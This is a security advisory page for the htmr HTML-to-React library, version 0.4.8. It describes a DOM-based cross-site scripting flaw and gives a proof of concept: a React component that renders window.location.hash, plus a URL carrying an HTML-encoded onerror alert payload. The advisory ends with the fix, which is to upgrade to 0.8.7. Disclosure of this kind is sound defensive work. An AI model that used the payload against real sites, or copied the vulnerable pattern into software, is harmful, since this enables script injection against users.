htmr@0.4.8 vulnerabilities

Simple and lightweight (< 2kB) HTML to React converter that works in server and browser

Direct Vulnerabilities

Known vulnerabilities in the htmr package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Cross-site Sripting (XSS)

htmr is a simple and lightweight conversion library from HTML string to react element coversions.

Affected versions of this package are vulnerable to Cross-site Sripting (XSS). This module uses innerHTML ref to unescape HTML entities. This leads to DOM-based XSS by inserting HTML-encoded XSS payload (see PoC).

PoC

  1. Create a React app: create-react-app xss-htmr
  2. Install htmr module: cd xss-htmr; npm i htmr
  3. Edit src/App.js file to this:
import React from 'react';
import convert from 'htmr';

export default function App() {
  return convert(`<p>Hash: ${window.location.hash}</p>`);
}
  1. Run the server: npm run start
  2. Visit http://localhost:3000/#&lt;img/src/onerror=alert('xss')&gt;, an alert will popup.

How to fix Cross-site Sripting (XSS)?

Upgrade htmr to version 0.8.7 or higher.

<0.8.7